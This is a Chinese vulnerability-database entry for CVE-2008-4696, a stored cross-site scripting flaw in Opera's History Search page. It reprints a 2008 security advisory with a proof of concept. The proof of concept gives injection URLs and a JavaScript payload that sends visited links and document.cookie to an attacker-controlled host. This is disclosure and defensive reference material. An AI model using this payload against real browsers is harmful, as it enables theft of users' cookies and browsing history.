Opera Web浏览器History Search 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116465 漏洞类型 跨站脚本
发布时间 2008-10-22 更新时间 2008-11-05
CVE编号 CVE-2008-4696 CNNVD-ID CNNVD-200810-409
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/6801
https://www.securityfocus.com/bid/31869
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-409
|漏洞详情
Opera是挪威欧朋(OperaSoftware)公司所开发的一款Web浏览器,它支持多窗口浏览、可定制用户界面等。Opera中的多个安全漏洞,可能允许恶意用户执行脚本注入攻击、绕过某些安全限制或泄露敏感信息。HistorySearch功能没有正确地过滤某些输入,用户在查看恶意数据时可能在用户的浏览器会话中注入任意HTML和脚本代码,泄露之前所访问的页面。
|漏洞EXP
=======================================================================
= Opera Stored Cross Site Scripting Vulnerability
=
= Vendor Website:
= http://www.opera.com
=
= Affected Version:
=   -- All desktop versions
=
= Public disclosure on 22nd October 2008
=
========================================================================
Available online at:
http://www.security-assessment.com/files/advisories/2008-10-22_Opera_Stored_Cross_Site_Scripting.pdf

== Issue Details ==

Opera browser is vulnerable to stored Cross Site Scripting.  A malicious attacker is able to inject arbitrary browser content through the
websites visited with the Opera browser. The code injection is rendered into the Opera History Search page which displays URL and a short
description of the visited pages.

== Bug Analysis ==

Opera.exe imports Opera.dll which handles most of the browser functionality.
Whenever a user visits a page, the URL, and a part of the content of the visited page is saved and compressed in a file named md.dat . The

file md.dat can be found at the following path in a standard Windows Opera installation:

c:\Documents and Settings\user\Local Settings\Application Data\Opera\Opera\profile\vps\0000\md.dat

The vulnerability exists in the way the URL and the content of visited page is stored and rendered from the md.dat file.

== Opera History Search Page Generation ==

User visits a new site. When the user closes the Opera browser, the file md.dat is updated. The Opera browser appends a block of 2000 bytes for each site visited.
The site URL and title are extracted and put in clear text at begin of the 2000 bytes block.
The preview content which appears on opera:historysearch page for the site is compressed into the file md.dat. However, the HTML encoding 
is not consistent across the URL scheme of the site and the injection is possible in the optional fragment of the URL (after the # character).

The following sequence summarises an attack scenario:

1.User visits http://aaa.com/index.htm#<script src=http://badsite/bad.js></script>
2.URL and preview content is stored in the history search page. However, the optional fragment after the character # is not encoded properly.
3.If the user visits the history search page, the cross site scripting is rendered in the user browser context.

== Opera History Search Page Rendering ==

When accessing the History Search page, Opera reads the file md.dat again. The content from md.dat is decompressed and 
saved into a buffer. The buffer is then used to generate a cache file that contains the HTML code of the history search page.
The cache file can be found such as:

c:\Documents and Settings\user\Local Settings\Application Data\Opera\Opera\profile\cache4\opr000EA

Then Opera reads the content from the cache file to display the history search page. The HTML code is not escaped for the optional 
fragment on the URL of the visited pages.

== Opera History/Cookie Exposed - Exploit Description ==

Victim visits site xxx/1.html and clicks on the link. The 1.html source code:

1.HTML

<html>
<a href='http://xxx/2.html#<script src=http://xxx/a.js></script>'>a</a>
</html>

The link includes the cross site scripting injection and brings the victim to page 2.html. The web server returns 200 OK. The 2.html source code:

2.HTML

<html>
This is a proof of concept.

<script>
setTimeout("document.location='opera:historysearch?q=*'",5000);
</script>
</html>

The user is then redirected to the opera:historysearch page where the injection has been stored in the history after the user followed the
link from 1.html. The injection inserted a malicious JavaScript a.js which is executed when the user reaches the opera history search page.

a.js


var x;
for (x in document.links)
{
document.write("<img src=http://yyy/xxx.asp?query="+document.links[x].href+">");
}
document.write("<img src=http://yyy/xxx.asp?keyword="+document.cookie+">");
setTimeout("document.location='http://xxx/3.html'",5000);

The malicious JavaScript includes a cross site forged request that dumps the URL of the visited pages to a third site yyy controlled by the attacker. 
Then the content of the cookie is also dumped and finally the user is redirected to another page 3.html.

== Opera History Cross Site Scripting and Cross Site Request Forgery ==

This is the HTML source code of the opera:historysearch?q=* page following the injection (highlighted in bold):

<li value="3">
<h2><a href="http://xxx/2.html#<script src=http://xxx/a.js></script>">(null)</a></h2>
<p>This is a proof of concept. </p>
<cite><ins>10/9/2008 12:39:16 AM</ins> - http://xxx/2.html#<script src=http://xxx/a.js></script></cite>

Note that in Opera 9.52, the injection is possible in other locations:

URL: http://xxx/2.html?a="><script src=http://xxx/a.js</script>

Injection:

<li value="3">
<h2><a href=http://xxx/2.html?a="><script src=http://xxx/a.js></script>">...


URL: http://xxx/2.html?a=<script src=http://xxx/a.js</script>

Injection:

<li value="3">
<h2><a href="http://xxx/2.html?a=<script src=http://xxx/a.js></script>">(null)</a></h2>
<p>This is a proof of concept. </p>
<cite><ins>10/9/2008 12:39:16 AM</ins> - http://xxx/2.html?a=<script src=http://xxx/a.js></script></cite>

Opera 9.60 has partially fixed the issues above but the HTML encoding is still not consistent.

== Credit ==

Discovered and advised to Opera
October 2008 by Roberto Suggi Liverani of Security-Assessment.com
Personal Page: http://malerisch.net

== Greetings ==

To all my SA colleagues - you guys rock!  ;-) 


== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and
a high level of technical expertise while creating long and lasting
professional relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

Roberto Suggi Liverani
Security-Assessment.com

# milw0rm.com [2008-10-22]
|受影响的产品
S.u.S.E. openSUSE 11.0 S.u.S.E. openSUSE 10.3 S.u.S.E. openSUSE 10.2 Opera Software Opera Web Browser 9.60 beta 1 Opera Software Opera Web Browser 9.60 Opera Software Ope
|参考资料

来源:BID
名称:31869
链接:http://www.securityfocus.com/bid/31869
来源:www.opera.com
链接:http://www.opera.com/docs/changelogs/mac/961/
来源:www.opera.com
链接:http://www.opera.com/docs/changelogs/linux/961/
来源:www.opera.com
链接:http://www.opera.com/docs/changelogs/freebsd/961/
来源:XF
名称:opera-historysearch-xss(46003)
链接:http://xforce.iss.net/xforce/xfdb/46003
来源:BUGTRAQ
名称:20081022OperaStoredCrossSiteScriptingVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/497646/100/0/threaded
来源:MISC
链接:http://www.security-assessment.com/files/advisories/2008-10-22_Opera_Stored_Cross_Site_Scripting.pdf
来源:www.opera.com
链接:http://www.opera.com/support/search/view/903/
来源:www.opera.com
链接:http://www.opera.com/docs/changelogs/windows/961/
来源:www.opera.com
链接:http://www.opera.com/docs/changelogs/solaris/961/
来源:MLIST
名称:[oss-security]20081022Re:CVERequest:Opera9.60withsecurityfixes
链接:http://www.openwall.com/lists/oss-security/2008/10/22/5
来源:MLIST
名称:[oss-security]20081021Re:CVERequest:Opera9.60withse